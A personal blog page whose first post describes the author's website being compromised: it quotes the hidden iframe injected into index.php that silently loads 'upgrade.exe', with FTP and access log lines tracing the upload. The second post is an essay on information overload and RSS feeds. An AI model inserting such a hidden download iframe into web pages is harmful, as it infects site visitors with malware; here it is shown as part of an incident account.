Into the Void

Back off, man, I’m co-creating my reality.

Sunday
22/18/2007

10:11 pm

Hacked

Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan - it didn’t flag the executable - and I suppose I should grab AdAware or Spybot S&D or both.

<IFRAME name=’StatPage’
src=’upgrade.exe’ width=5 height=5
style=’display:none’></IFRAME>

Now if you’ll excuse me, I’m going to go boil my laptop.

Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.

Update 11/25:
I am so pwned.

First access of this file - the first person who was infected by my site - gives me an idea when it was uploaded to my server.

68.14.90.4 - - [18/Nov/2007:07:23:21 -0800] "GET /~void/tag/t-gondii/upgrade.exe HTTP/1.1" 404 31911 "http://www.bipolarplanet.com/~void/tag/t-gondii/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"

That’s someone who my webpage may have infected. After that the accesses come several times a page.

This is the ftp access where the hacker uploaded the infection and the hacked index.php:

Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Mon Nov 19 02:46:36 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:50:33 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:55:12 2007 0 69.141.48.56 95 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ i r void ftp 0 * c
Mon Nov 19 03:05:05 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/indexhacked.php a _ o r void ftp 0 * c
Mon Nov 19 03:52:48 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ o r void ftp 0 * c
Mon Nov 19 03:52:58 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ d r void ftp 0 * c

66.246.252.53 resolves to sr178.2dayhost.com - that’s the hacker.
69.141.48.56 resolves to c-69-141-48-56.hsd1.pa.comcast.net - that’s me.

Wednesday
13/16/2005

1:11 pm

And the Wisdom to Know the Difference…

The Internet is big. No, really BIG. It is possible to look online for a recipe, follow a link to the history of the recipe and the culture of the people who created the recipe. Before you know it, dinnertime is a distant memory, bedtime is long past, and tomorrow morning is shining right into your tired, bloodshot eyes.

The problem is one of information overload. Information, you see, doesn’t create wisdom. Wisdom comes from choosing which information is useful for the task at hand, whether that task is cooking dinner or writing an essay on the funerary practices of the Fore tribe in New Guinea. Or both.

When I first had net access - and Al Gore hadn’t invented the Internet yet - information was limited and it was sometimes difficult to locate it. There were several types of indexing, with special command-line programs to access them. Gopher was the very apt name of a commonly-used program used to dig into the information indexes. When you eventually found what you wanted, you’d then have to launch a separate application to handle the File Transfer Protocol (FTP).

When I finally gained access again, a fledgling HyperText Transport Protocol (HTTP), in conjunction with the Graphical User Interface (GUI) of the MAC and of Microsoft Windows, provided easy access to related information, and yes, I got lost surfing more times than I can count.

Here it is several years later, and I hardly ever surf aimlessly. I also have given up on wordy but rather content-sparse general news outlets, including TV, newspapers, radio and even the big online news portals. Frankly, most news articles can be absorbed from the title and first paragraph. So how do I surf for titles and first paragraphs?

Well, in the last couple of years it is becoming more common for on-line resources to provide Really Simple Syndication (RSS) feeds. An RSS feed is a text file that contains, at minimum, titles and summaries of recent articles on the main site. RSS feeds play an important part driving traffic to the information provider.

In future articles I will be exploring new tools for presenting information on the web, and their attendant issues. It is my hope that in clarifying the issues for myself, I will help clarify them for others.


Bad Behavior has blocked 3740 access attempts in the last 7 days.